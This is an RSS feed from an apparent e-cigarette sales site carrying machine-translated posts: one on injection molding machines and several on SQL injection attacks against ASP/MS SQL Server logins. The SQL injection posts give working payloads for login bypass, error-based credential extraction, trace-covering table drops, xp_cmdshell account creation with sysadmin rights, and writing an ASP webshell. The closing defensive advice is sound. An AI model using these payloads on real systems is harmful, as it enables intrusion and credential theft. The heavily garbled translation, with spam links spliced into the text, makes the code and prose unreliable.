<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Electronic Cigarette Sale, Kimree Electronic Cigarette Sales</title>
	<atom:link href="http://www.tianshi-cn.net/feed" rel="self" type="application/rss+xml" />
	<link>http://www.tianshi-cn.net</link>
	<description>KImree Electronic Cigarette Sales offering top Electronic Cigarettes.</description>
	<lastBuildDate>Fri, 03 Feb 2012 12:20:02 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Translation of the article (injection mold) Injection Molding Machines, and the Selection of Resin</title>
		<link>http://www.tianshi-cn.net/archives/552</link>
		<comments>http://www.tianshi-cn.net/archives/552#comments</comments>
		<pubDate>Fri, 03 Feb 2012 12:20:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[injectionmold]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Injection molding machines are manufactured in man]]></description>
			<content:encoded><![CDATA[<p>Injection molding machines are manufactured in many sizes. These are rated according to size by the amount of material which can be injected in one cycle, which ranges from a fraction of an ounce in the small laboratory models to many pounds in large production equipment. Laboratory models are used in the research and development of new polymers and molding techniques. <br /> There are two basic units to an injection molding machine; one for injecting the heated plastic and one for opening and closing the mold. The first unit includes a feed hopper, heated injection cylinder, and an injection plunger or screw system. The second unit comprises a hydraulic operated moving platen and a stationary platen on which the halves of the mold are mounted. Injection molding machines are also available in vertical models. <br /> There are many variations in injection molding machine design, however, the basic machines are of either the screw-ram, or plunger type. The main difference between these types is the method in which the plastic material is delivered from the hopper to the nozzle of the machine. Machines of the reciprocating-screw type are used more because of the material. <br /> The injection molding machine has a variety of instrumentation used for the clamping unit , mold, and injection molding machine. Fig.2.1.1 shows the most important possibilities of the instrumentation. In fact, there is no known direct method for in-line checking of the condition of the mold. <br /> <br / > A typical laboratory injection molding machine, will vary in shot capacity from a few grams to about one-half ounce. It will have a clamping device that is usually hand operated with a cam action and an injection system operated manually or by compressed air. The injection system exerts very high pressure on the mold, from 5000 to 20000 psi. It is therefore necessary for the mold to be clamped together with a greater pressure than the injection pressure or the mold halves will be forced apart and flash (squeeze out of the resin at the parting line of the mold) will result.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/552/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>On the attack and prevention of SQL injection (SQLinjection)</title>
		<link>http://www.tianshi-cn.net/archives/551</link>
		<comments>http://www.tianshi-cn.net/archives/551#comments</comments>
		<pubDate>Fri, 03 Feb 2012 12:19:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[sqlinjection]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[On the <br /> <h3>, attacks and prevention of SQL ]]></description>
			<content:encoded><![CDATA[<p>On the <br /> <br />
<h3>, attacks and prevention of SQL injection (SQLinjection) </ H3> <br /> tags: the sql <br /> <b> 1 bak files leak asp source code </ B> <br /> a lot of editing tools, such as Editplus, UltraEdit by default to save the file, will automatically back up a bak files. Such as creating or edit config.asp file, the editor will automatically generate a config.asp.bak file, if not delete the file, an attacker can http://www. *** .com / Config.asp.bak to download asp source code. <br /> you can imagine, your source code is downloaded, the risk of attack is undoubtedly much larger. And if the configuration file, user name, password, database name / location &#8230; <br /> solutions: either directly close the editor, the automatic backup feature, or upload, delete all bak file. the <br /> <b> 2, authentication bypass </ B> <br /> general site there are many pages need to authenticate through to access the user identity again, in these pages to verify, but many programmers tend to ignore it. If the attacker knows the path and file name of these pages, you can bypass the authentication directly into the page. Such as: the need for users to login via the login.asp page to open manage.asp page after authentication. The attacker can http://www. *** .com / Manage.asp directly into the management interface. <br /> solution: in these pages at the beginning of the identification. : Passed the authentication by a the session (&#8220;login&#8221;) = &#8220;ok&#8221; to join manage.asp the beginning <br /> following code: <br /> if session (&#8220;login&#8221;) <> &#8221; ok &#8220;to <br /> then <br /> response.redirect&#8221; login.asp &#8220;end if <br /> above 2:00 <br /> said are programmed basic problems, here to discuss the focus of this article on sql injection attacks and prevention. the <br /> <b> 3, asp program database password validation vulnerability </ B> <br /> First of all, on the request object, we know that, in the form the form using the get method to transfer data, it should be QueryString collection to retrieve the form data; use the post method to transfer data, you should use the Form collection to retrieve the form data. More programmers in order to facilitate direct collection name is omitted, the use of the request (&#8220;data&#8221;) to retrieve the data, it seems simple, in fact, inefficient and error-prone. asp default search order of the collection is the QueryString, Form, cookie, Serverariable, when the first matching variable is found, identified the members you want to visit. It is proposed that we should not use this method, digression finished, we turn to the question. <br /> first login.asp file <br /> the following code: <br /> &#8230; <br /> <br />
<form action = "verify.asp" method = "post" <br /> name = &#8220;login&#8221;> <br /> user name<br />
<input type = text name = name value = "" <br /> the maxlength = &#8220;20&#8243;> <br /> < br /> password<br />
<input type = password name = pwd value = "" <br /> the maxlength = &#8220;20&#8243;> <br /> <br />
<input type = submit the name = bt <br /> value = &#8220;confirm > <br /> <br />
<input type = the reset name = bt <br /> value = &#8220;Reset&#8221;> <br /> </ form> <br /> &#8230; verify.asp file <br /> &#8230; <br /> look the following code: <br /> &#8230; <br /> dim rs the sql <br /> dim name, pwd <br /> name = request.form (&#8220;name&#8221;) <br /> pwd = request.form (&#8220;pwd&#8221;) < br /> if name = &#8220;&#8221; or pwd = &#8220;&#8221; then <br /> response.redirect &#8220;login.asp&#8221; <br /> end if <br /> &#8230; <br /> uthentication <br /> sql = &#8220;select * from user where <br /> name = quot; </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/551/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQLInjection information hidden code) SQL fill in the blank game hackers)</title>
		<link>http://www.tianshi-cn.net/archives/550</link>
		<comments>http://www.tianshi-cn.net/archives/550#comments</comments>
		<pubDate>Fri, 03 Feb 2012 12:19:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[sqlinjection]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[<br /> computer system security has been your atte]]></description>
			<content:encoded><![CDATA[<p> computer system security has been your attention, but perhaps you have been installed for the system patches, antivirus software, set up a firewall, the provisions of the demilitarized zone, but may be due to the writing of negligence on the part of the code, you behind is to create a large loophole. <br /> SQL Injection &#8211; the hacker SQL fill in the blank game <br /> in the modern application architecture, most of them contain the database in order to accommodate a wide variety of information. In Among the various types of database structure query language SQL <br /> Structure, Query Language) based <br /> of the relational database management system RDBMS Relational Database Management System) is the most popular. <br /> general programmers to access the database, often using third-generation languages ??such as Visual Basic to organize the language of the SQL <br /> then passed the implementation of the relational database system to to create or delete the data structure, to give or remove permissions, and even new, modify, delete, or query data. Implementation of the action of the relational database, SQL commands are to follow <br />, through this way can easily complete a variety of data maintenance. But also due to the SQL <br the /> languages ??omnipotent, so a slight vulnerability will allow an attacker to take advantage of. @ Two articles on this topic to do a deep into the discussion. <br /> site data access is generally more dangerous, the Internet is an open environment, rather than the general company intranet, in addition to the safety design of the computer itself, you can also filter the background of the identity of the screening staff. Compliance guide to snakes and on the Internet, most users are moments, but a few malicious people deliberately want to invade into our system and steal valuable information. The network management staff and Web designer, may be on the security settings with numerous prevention, such as setting up a firewall, design demilitarized zone <br /> the DMZ), restriction site board into the identity. However, due to the lack of awareness of the SQL language and database management system, open the back door of the system. <br /> for Microsoft ASP site architecture with MS SQL Server to do a discussion and demonstration, hope can provide the site management staff from possible attacks SQL <br /> Injection <br /> a basic familiarity with the author at the time of this writing, the use of search sites free to find the site of several members mechanism to test most of them have such a way to invade into the danger, we should not be careless. <br /> I first create an example of a general membership website Teng page, as well as the structure of the table as follows: <br /> table schema, such as program code in Listing 1. <br /> CREATE TABLE [tblUser] <br /> [UserID] [int] IDENTITY 1, 1) NOT NULL, <br /> [UserName] [nvarchar] 50 ) NOT NULL, <br /> [Password] [nvarchar] 50) NOT NULL, <br /> [Pri] [tinyint] NULL CONSTRAINT [DF_tblUser_Pri] DEFAULT <br /> 0), <br /> CONSTRAINT [PK_tblUser] PRIMARY KEY CLUSTERED <br /> [UserID]) <br />) <br /> code list: store Member data table Schema. <br /> and tables added to the two data content <br /> INSERT tblUser UserName, Password, Pri) VALUES <br /> dmin dminPass 10) < br /> <br /> INSERT tblUser the UserName, Password, the Pri) VALUES <br /> yron, the yronPass 10) <br /> board into web pages written, such as code list. <br />% <br /> If the Request for UserName &#8220;)&#8221; And Request &#8220;Pass&#8221;) &#8220;&#8221; Then <br /> Dim cnn, rec, strSQL <br /> the Set cnn = Server.CreateObject &#8220;ADODB.Connection&#8221;) <br /> With cnn <br /> ConnectionString = Application &#8220;Conn&#8221;) <br /> Open <br /> ata the user entered into the combination of the SQL syntax <br /> strSQL = &#8220;SELECT * FROM tblUser the WHERE the UserName = <br /> < br /> the Request &#8220;UserName&#8221;) &#8221; ND the Password = quot; Request &#8220;Pass&#8221;) &#8221; quot; <br /> directly to the SQL Server is running, @ is the most dangerous place <br /> < br /> Set rec =. Execute strSQL) <br /> End Wit <br /> If NOT rec.EOF Then <br /> Session &#8220;UserName&#8221;) = Request &#8221; UserName &#8220;) <br /> Response.Write&#8221; Welcome to the &#8220;Request&#8221; UserName &#8220;) <br /> Else <br /> the Response.Write&#8221; Your account / password is entered into the error <br /> End <br /> Else </p>
<p> on Form action = &#8220;login.asp&#8221; <br / > <br /> user name: Input Name = &#8220;the UserName the&#8221; P <br /> password: Input Name = &#8220;Pass,&#8221; <br /> P <br /> Input type = &#8220;submit&#8221; Value = &#8220;OK&#8221; <br /> / Form <br />% <br /> End <br />% <br /> Code Listing 2: Simple ASP board into the web page. <br /> in the code list in the ASP page using VBScript <br /> combined query user accounts online game ranking 2011 top ten: http://www.xinquwan.com/, password SQL <br /> queries the syntax, the logic is quite simple, if the table there in line with account, password, record, return Recordset EOF property <br /> False, the user even if the board into the correct. <br /> for such pages, the following started using SQL Injection techniques to startle the @ site! <br /> a user using any known user name Gordon into sql/SQL_Injection_G1.htm # 1 &#8220;> 1: for example, in Internet cafes secretly observed splicing syntax <br /> Gordon into what kind of account to which sites, and more, or try the general management staff may establish user name such as: admin, administrator, and supervisor, sa <br /> and so on. <br /> the contents need to be entered into the user name into the following sql/SQL_Injection_G1.htm # 2 &#8220;> 2: <br /> Admin &#8211; <br /> while the password field lightly lose forward, the sentence will be executed SQL. Diagram shown in Figure 1. <br /> Figure 1: use the name of a known member of the board into the code to skip the password check. <br /> you can try the SQL syntax of the user name will be entered into the content and code list to be finishing, will be found to passed to the SQL Server syntax is as follows <br /> <br / > <br /> SELECT * FROM tblUser WHERE UserName = dmin &#8211; AND <br /> Password = sdf <br /> The key is the original AND clause &#8211; &#8220;marked instructions SQL Server only perform <br /> SELECT * FROM tblUser the WHERE the UserName = dmin <br /> natural, if the user exists, then the SQL query syntax to pass back to the record of all fields of the code list to determine the way: <br /> Recordset returned record, if so, even if the board into the authentication is successful, the hacker can easily by the user enter into the identity. <br /> Teng Jin: unknown user name and no known account also can be used in the following way entered into the username field will be able to openly The ground invasion into: <br /> r 1 = 1 &#8211; <br /> SQL Server to receive the entire syntax becomes: <br /> SELECT * FROM tblUser WHERE UserName = r 1 = 1 &#8211; AND <br /> Password = sdf <br /> plus the or 1 = 1, regardless of prior conditions of together, as long as a condition for In truth, the whole judgment type are true, the returned Recordset <br /> object contains all the membership records. also led to the Recordset object code list EOF property to False. <br /> the use of an error message <br /> @ take the field number and name <br /> Microsoft in order to facilitate the ASP programmers can successfully debug, so whenever Script execution error through <br /> over the default system where the disk \ WINNT \ Help \ iisHelp, \ common \ 500-100.asp <br /> website error occurred back to the front end for developers! a very convenient presentation of error. but hackers can also use this error message to obtain the query syntax in the original ASP <br />, and learn about the architecture of the database table for example, entered into the username field: <br /> he HAVING 1 = 1 &#8211; <br /> the system will return back to Figure 2, an error message. <br /> Figure 2: the deliberate creation of an error, look for clues from the error message. <br /> from Figure 2 can store the user name of the table is tblUser query has a field called the UserID so we once again entered into: <br /> ROUP BY, the UserID the HAVING 1 = 1 &#8211; <br /> back to the error message shown in Figure 3. <br /> Figure 3: the error message to understand the table the general structure <br /> again in the error message shown in Figure 3 shows the query field the UserName, web games list 2011 10 therefore continue in the following manner to query sql/SQL_Injection_G1.htm # 3 &#8220;> 3. <br /> he GROUP BY the UserID, the UserName the HAVING 1 = 1 &#8211; <br /> The way to take to the full query syntax, which is entered into the following syntax, but it is no longer result in run-time error: <br /> he GROUP BY the UserID, UserName, Password, the Pri the HAVING 1 = 1 &#8211; <br /> passed to SQL Server syntax becomes: <br /> <br / > SELECT * FROM tblUser WHERE UserName = ROUP BY <br /> UserID, UserName, Password, Pri HAVING 1 = 1 &#8211; AND <br /> Password = sdf <br /> so listed all the fields in Group By way almost equal to the Group, <br /> By, but the syntax is completely correct all the fields have been included in which The hacker thereon can give a ballpark estimate of the field structure of the table. <br /> entered into account local capacity to implement the following syntax can be added to customize the user to the table. <br /> INSERT INTO tblUser Values hacker acker 10) &#8211; <br /> @ take the field data type <br /> data field format does not cause can not be added to the custom user can also use the following syntax returns an error message to interpret the data field format: <br /> he UNION SELECT abc 1, 1,1 FROM tblUser &#8211; <br /> results returned as shown in Figure 4, an error message. <br /> Figure 4: The error message to determine the field data type. <br /> in the @ UNION syntax to combine two SELECT query, the first sentence of the first column of the SELECT syntax bit UserID int <br /> format corresponding to the second sentence of the SELECT syntax; information of the first field is a varchar format <br /> bc resulting in the error message shown in Figure 4 <br />. The hackers are thus informed that the first field of the table data type <br /> an int. Patient after a field test, we can get the entire table field format. take the member account password </p>
<p> @ using @ a skill can also further access to the user ID and password, for example, to ask account of the following syntax: <br / > <br /> NION SELECT UserName, 1,1,1 FROM tblUser WHERE <br /> UserName &#8211; <br /> IIS returns an error message shown in Figure 5. <br /> Figure 5: the error message to the user ID and password. <br /> records returned Admin is nvarchar format, corresponding to the original int data fields through the union, so the error message in Figure 5 <br />. By the above error can know the existence of a group called Admin account, the account password and then have the following syntax @. <br /> he UNION SELECT Password, 1,1,1 the FROM tblUser the WHERE <br /> UserName = admin &#8211; <br /> error message shown in Figure 6. <br /> Figure 6: error message to obtain the account admin password. <br /> then continue with the following syntax to the @ to get the other person account password. <br /> NION SELECT UserName, 1,1,1 FROM tblUser WHERE <br /> UserName dmin &#8211; <br /> error message shown in Figure 7. <br /> Figure 7: The sequence through the same mechanism, the other person account password. <br /> in turn replace the conditions in the WHERE the UserName, you can get the account and password combination in the table. <br /> hackers and even through the following syntax to the entire user account password strung string into the SQL statement such as the code list: fill in the fields entered into the user account. <br /> DECLARE @ str VARCHAR 8000) SET @ str = @ ELECT @ str = @ str   <br /> UserName   / Password FROM tblUser WHERE UserName> @ str SELECT <br /> @ str AS IDPass an INTO tblHacker &#8211; <br /> Code Listing 3: The composition of all the user data string, into a custom table. <br /> in code listing 3, the first declaration of a length 8000 string variable @ the str, then the contents of the entire tblUser table composed of a string into a variable <br /> @ str Finally, use the SELECT &#8230; INTO &#8230; syntax @ str variable content into a self-built information the table tblHacker <br />. <br /> and then use the aforementioned techniques intentionally create error in exchange for information content. <br /> NION SELECT IDPass, 1,1,1 FROM tblHacker &#8211; <br /> results shown in Figure 8. <br /> Figure 8: retrieve all of the user account password information. <br /> of course, afterwards to be a clear action to avoid the attention of the system management staff, entered into the following content is still operating in the Name field. <br /> DROP TABLE tblHacker &#8211; <br /> in the current article, the author first volume of a SQL Injection <br /> attack, I believe you are not excited and eager to want to find a few sites to surgery, is dread, and quickly examine how their own systems. Whether you are what is, I look forward to this article will not misuse, if heart test do not stand the degree of safety, I suggest you to inform the outcome of the management staff of the station, so that the entire Internet world is more secure, ordinary people would be willing to flow ripple on, and our IT staff have a better future. <br /> next issue of the article, I will continue to be the first volume of Advanced SQL Injection attacks and the response to prevent the road, looking forward to seeing you again. <br /> Postscript: give each case, not only refer to the Microsoft SQL <br /> Server, in terms of virtually all relational databases such as Oracle, etc. is. The same time, give all patients, not just referring to the ASP, in fact, all the dynamic pages such as JSP, PHP, etc. so <br /> even if your system is still stuck in CGI technology is the same), the advice you Live View your system for possible disruptions. <br /> Note: </p>
<p> I observed today many members mechanism site in Gordon into the ID number when for the board into account, so as long as hackers try to get a member ID number you can try @ a method. <br /> 2 <br /> the following SQL Injection board into the field of user account and be entered into the SQL <br /> syntax, the implementation of the various possible ways to organize , while the use &#8211; marked the back of the password field into SQL instructions. </p>
<p> hackers characteristics: patience. I therefore did not make the hacker talent, in order to write @ article, I repeatedly test each site, duplicate the process is very tedious, and concluded that since this effort, I would prefer more books and earn a legitimate incorporated into the <br /> [industry report] Zhongguancun: user survey report 2011 web games <br /> addition to tomorrow night face: Le Tiger, Music doubt, Le Tour <br /> game point volume <br /> game story will be Celestial game design breakthrough point <br /> Jie ETSeasy Saili telecommunications networks. Recruitment agent software calls QQ game prepaid </p>
]]></content:encoded>
			<wfw:commentRss>http://www.tianshi-cn.net/archives/550/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL Injection (Injection Code) hackers SQL fill in the blank game (below)</title>
		<link>http://www.tianshi-cn.net/archives/549</link>
		<comments>http://www.tianshi-cn.net/archives/549#comments</comments>
		<pubDate>Fri, 03 Feb 2012 12:19:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[sqlinjection]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[<br />> <br /> in the previous period, the first v]]></description>
			<content:encoded><![CDATA[<p>> <br /> in the previous period, the first volume through a combination of SQL syntax; a relatively simple way to invade into the website system, this issue is further the first volume through the SQL Server <br /> powerful functionality, may be completed to further invasion into the action. <br /> SQL Injection SQL fill in the blank game hackers (2) <br /> SQL Server itself provides a lot of functions, stored procedures, extended stored procedures to aid in the T-SQL , so programmers <br /> through the T-SQL stored procedures to complete the trade logic necessary for the operation. However, general users are more familiar to Vis, l The Basic <br /> programming language to write programs of access to information, knowledge soon after which the function of this class, let alone how to prevent hackers through a class function to carry out its purpose. <br /> destructive syntax <br /> The following lists some of the functionality slightly discussion. <br /> stopped the SQL Server execution <br /> directly entered into the Shutdown command, requires SQL Server to stop the execution. Entered into the accounts on a web page can key into the following syntax can be: lt;br />; the SHUTDOWN &#8211; <br /> undermine the content <br /> Of course, as long as permission, can also do the destructive SQL <br /> syntax sql/SQL_Injection_G2.htm # 1 &#8220;> 1. delete a database: DROP <br /> Database database name &#8211; <br /> deleted a database table: the DROP Table table name &#8211; <br /> empty a table: Truncate Table Table name &#8211; <br /> is or DELETE to clear the table of the data: DELETE FROM table name &#8211; <br /> use of advanced and powerful extended stored procedures <br /> a class of functions the stored procedure and many more xp_ the beginning, stored in the extended stored procedure in the master database. interesting is the accompanying online help of most of the extended stored procedure in SQL <br /> Server <br /> are not listed, nor did I think this Microsoft Web site use full-text search to look @ some of the extended stored procedures clues to the list of discussion, but mostly no comment (undocumented), it seems an extension of the stored procedures of course feature powerful, but Microsoft does not encourage people to use. <br /> I selected some of the more interesting were the first volume. <br /> the implementation of other applications <br /> the xp_cmdshell is our greatest one of the commonly used extended stored procedure through @ a extended stored procedure SQL Server <br /> system account to run any applications. <br /> the following code list is a direct use of the operating system attached to the NET utility, in the Windows system into a user account Hacker, <br />; password and account added to SQL Server, and then put to the largest user of power group members of the sysadmin: ; EXEC <br /> MASTER .. XP_CMDSHELL et user Hacker / add EXEC <br /> MASTER .. SP_GRANTLOGIN YRON-XP \ Hacker EXEC <br /> MASTER .. SP_ADDSRVROLEMEMBER YRON-XP \ Hacker ysadmin &#8211; <br /> code list 1: Add a custom of the user, and give the account permissions. <br /> If you open Internet network access take the SQL Server default TCP 1433 port, the hacker will have the opportunity Tang Huang of control SQL <br /> Server. <br /> and Registry system stored procedure <br / <br /> SQL Server provides a number of Registry-related extended stored procedures to xp_reg <br /> the beginning as a representative of sql/SQL_Injection_G2.htm # 2 &#8220;> 2. Content: <br /> xp_regaddmultistring <br /> xp_regdeletekey <br /> xp_regdeleteval <br /> xp_regenumkeys <br /> xp_regenumvals <br /> <br the /> xp_regread <br /> xp_regremovemultistring <br /> <br the /> xp_regwrite <br /> hackers can take advantage of such an extended stored procedure to access the system registration information , for example, query the machine on which the shared directory, example code list <br /> 2. And then use a skill, to render the results in an error message. CREATE TABLE tblShareDir (DirName <br /> VARCHAR (100), DirAtt VARCHAR (100)) <br /> INSERT tblShareDir EXEC MASTER .. XP_REGENUMVALS <br /> HKEY_LOCAL_MACHINE, ystem \ CurrentControlSet \ Servi <br / ces \ lanmanserver \ shares <br /> code list 2: to use XP_RegEnumVals shared directory in the system. <br /> re-use on articles first volume of the skills to present the results in an error message, or the following text through bcp.exe utility the tblShareDir <br /> output to a file, you can achieve would like to the desired results. <br /> extended stored procedures <br /> SQL Server provides an access to the server external OLE object stored procedures and OLE Automation / COM object. They are: the sp_OACreate <br />, </p>
<p> sp_OADestroy <br /> sp_OAMethod <br /> sp_OAGetProperty <br /> sp_OASetProperty < br /> <br /> the sp_OAGetErrorInfo <br /> <br the /> sp_OAStop <br /> OLE objects (COM objects you can use them to build on it, but to support the IDispatch <br /> mediated surface), the implementation of the object, read and modify the attributes for error handling. But they can not respond to events of general OLE or COM object. <br /> With COM / OLE <br /> the establishment and implementation of the object, for the control system can be regarded as even more powerful and omnipotent the. Slightly for example, hackers can use it to get a hobby page source code list <br /> 3: the DECLARE _AT_ the shell the INT the EXEC SP_OACREATE the wscript.shell the shell <br /> the OUTPUT EXEC SP_OAMETHOD @ shell, un null, <br /> : \ WINNT \ system32 \ cmd.exe / c type c: \ inetp <br /> \ wwwroot \ sqlinject \ login.asp c: \ inetp < br /> \ wwwroot \ sqlinject \ test.txt <br /> code list: made login.asp page content. <br /> in the code list, use SP_OACREATE to establish wscript.shell object, and use SP_OAMETHOD calling <br /> wscript.shell object run method to execute operating system command interface tool program cmd. exe, will the login.asp output to the <br /> test.txt file, the @ when hackers entered into on a web page http://..test.txt can see <br /> target = _blank> http :/ / .. test.txt &#8220;> http://..test.txt can see <br /> the login.asp writing the basic information as the invasion into the next <br /> <br / > Of course, hackers can also use the Scripting.FileSystemObject object to create a back door of an ASP page, the syntax shown in the code list <br />: the DECLARE @ fs int @ fi int <br /> the EXEC SP_OACREATE Scripting.FileSystemObject fs OUTPUT <br /> EXEC SP_OAMETHOD @ fs, CreateTextFile @ fs OUTPUT, C: \ InetP <br /> \ WWWRoot \ SQLInject \ Shell.asp 1 <br /> EXEC SP_OAMETHOD @ fs, riteLine null, Set <br /> objShell = Server.CreateObject (&#8220;WScript.Shell&#8221;): objShell.Run <br /> Reqst (&#8220;cmd&#8221;) lt;br /> <br /> code list: Create an ASP backdoor pages. <br /> from the window. through the URL <br /> can execute any executable file, the sample are as follows: http://localhost/sqlinject/shell.asp?cmd=C: the \ WINNT \ <br /> system32 \ cmd.exe / c <br /> target = _blank> http://localhost/sqlinject/shell. asp? <br /> cmd = C: \ WINNT \ system32 \ cmd.exe &#8220;> http://localhost/sql <br /> i nject / shell.asp? cmd = C: \ WINNT \ system32 \ cmd.exe / c type c: \ inetp <br /> \ wwwroot \ sqlinject \ login.asp c: \ inetp <br /> \ wwwroot \ sqlinject \ test.txt <br /> other extended stored procedures <br /> a class of extended stored procedure, you may have to be careful: <br /> the extended stored procedure name <br /> uses <br /> usage examples <br /> xp_availablemedia <br /> @ show available on the system drive, such as C: \. <br /> <br the /> xp_availablemedia <br /> xp_dirtree <br /> @ show the subdirectories in a directory and file structure. <br /> xp_dirtree : \ inetp \ wwwroot \ <br /> xp_enumdsn <br /> listed already on the system configured ODBC data source names (DSNs Data Source Name). <br /> xp_enumdsn <br /> xp_enumgroups <br /> lists the operating system on the user group and the group description. <br /> <br the /> xp_enumgroups <br /> xp_getfiledetails <br /> @ take the relevant attributes of a file. <br /> xp_getfiledetails : \ Inetp \ wwwroot \ SQLInject \ login.asp <br /> dbo.xp_makecab <br /> target multiple files compressed into a within the target file. <br /> all the compressed files can be connected to the last side in the argument list, separated by commas. <br /> dbo.xp_makecab <br /> : \ test.cab szip 1, <br /> : \ Inetp \ wwwroot \ SQLInject \ login.asp <br /> C: \ Inetp \ wwwroot \ SQLInject \ securelogin.asp lt;br /> <br /> &#8230; <br /> xp_ntsec_enumdomains <br / > <br /> listed in the server domain name. <br /> xp_ntsec_enumdomains <br /> xp_servicecontrol <br /> stopped or start a service. <br /> xp_servicecontrol top chedule <br /> xp_servicecontrol tart chedule <br /> dbo.xp_s dirs <br /> column subdirectory in a directory. <br /> dbo.xp_s dirs : \ <br /> xp_terminate_process <br /> stopped a running program, but given the parameters of the Process ID . /> <br /> <br work administrators through the menu "View" - "select field" pid check, you can see the Process ID for each program execution <br /> xp_terminate_process 2484 <br /> <br the /> xp_unpackcab <br /> unlock the zip file. <br /> xp_unpackcab : \ test.cab : \ temp <br /> The above table lists the extended stored procedure is the author of the master <br /> system database to find the name of the more interesting; after each of the test results. Does not mean an extended stored procedure can be used to invade into the system have been fully listed, creative renovation repeatedly whether the hackers, you must always cautious. through some of the utility provided by SQL Server, SQL Server Utility, </p>
<p> can directly output the contents of a table into a file, such as through bcp out <br /> parameters. the entire output of the table to store membership information to a file, example as follows: the bcp northwind.dbo.tblUser out <br /> C: \ inetput \ wwwroot \ sqlinject \ user.txt-c-Usa-P-SByron-XP <br />, of course, isql.exe and osql.exe also can do the same function, for example: the osql-Usa-P-SByron-XP <br />-dNorthwind-oc: \ inetp \ wwwroot \ sqlinject \ users.txt,-Q &#8220;select * <br /> from tblUser&#8221; <br /> a type of utility can be used with before xp_cmdshell extended stored procedure, or referred to the use of the sp_OA series of stored procedures Trojan ASP <br /> established to implement, can achieve the purpose of stealing information. <br /> invasion into techniques for preventing SQL Injection build? br> <br /> above, the author of this back satisfied that some of the maintenance of system security. <br /> try to use ASP or ASP.NET <br /> in the server-side checks and limitations entered into the variable type and length, filter out unwanted content. It should be noted that @ some of the check not on the front end. <br /> even if the front end using HTML the Input label the MaxLength property, or to the JScript <br /> write code to set the field length limit, as long as the web pages Save and modify content (usually rewrite the Form Action Properties and Input <br /> the MaxLength property), to re-open the browser and then the implementation can avoid the @ some browsers check. <br /> ASP program board into the account of the SQL Server do not use the sa, or any account belonging to the Sysadmin <br /> group, to avoid the big permissions. <br /> the sa must have a strong password, especially in previous versions of SQL Server 7.0 installed when the default sa <br /> no password, the general governance Bahrain forget or be afraid trouble without changing the password. <br /> use the ADO Command object or ADO.NET SqlCommand class to execute SQL <br /> syntax through the parameters directly to ADODB Connection object to the wording of the implementation of the stored procedure is as bad. Example: Exec is spXXX <br /> parameters, &#8230; <br /> Because hackers are added as SQL syntax can be performed: Exec spXXX parameters, &#8230;; the SHUTDOWN <br /> we can create a stored procedure code list 5: ECREATE PROC spUserAccount <br /> @ UserName NVarchar (50) @ Password NVarchar (50) <br /> AS <br /> SELECT UserName, Password FROM tblUser <br /> WHERE UserName _AT_ the UserName AND the Password @ Password <br /> program code list: used to find a matching user account passwords stored procedure. <br /> replaced the entire ASP query such as the wording of the code list:% <br /> If Reqst (&#8220;UserName&#8221;) &#8220;&#8221; And Reqst (&#8220;Pass&#8221;) &#8221; &#8220;Then <br /> Dim cnn, rec, strSQL, cmd in <br /> Set cnn = Server.CreateObject (&#8221; ADODB.Connection &#8220;) <br /> With cnn < br /> <br /> the ConnectionString = Application (&#8220;Conn&#8221;) <br /> Open <br /> End Wit, <br /> hrough the ADODB.Command objects with stored procedures, hackers will not be able to <br /> se of combinations of SQL strings to invade into the system <br /> Set cmd = Server.CreateObject (&#8220;ADODB.Command &#8220;) <br /> With cmd <br />. ActiveConnection = cnn <br />. CommandText =&#8221; spUserAccount &#8220;<br />. CommandType = 4 dCmdStoredProc <br />. Parameters.Append. CreateParameter (&#8220;UserName&#8221;, 202, 1, 50, <br /> Reqst (&#8220;UserName&#8221;)) <br /> 02 behalf of adVarWChar , 1 adParamInput <br /> Parameters.Append. CreateParameter (&#8220;Password&#8221;, 202, 1, 50, <br /> Reqst (&#8220;Pass&#8221;)) <br /> the Set rec =. Execute () <br /> End Wit <br /> If NOT rec.EOF Then <br /> Session (&#8220;UserName&#8221;) = Reqst (&#8220;UserName&#8221;) <br /> Response.Write &#8220;Welcome&#8221; Reqst (&#8220;UserName&#8221;) <br /> Else <br /> the Response.Write &#8220;Your account / password entered into the error <br /> End <br /> Else </p>
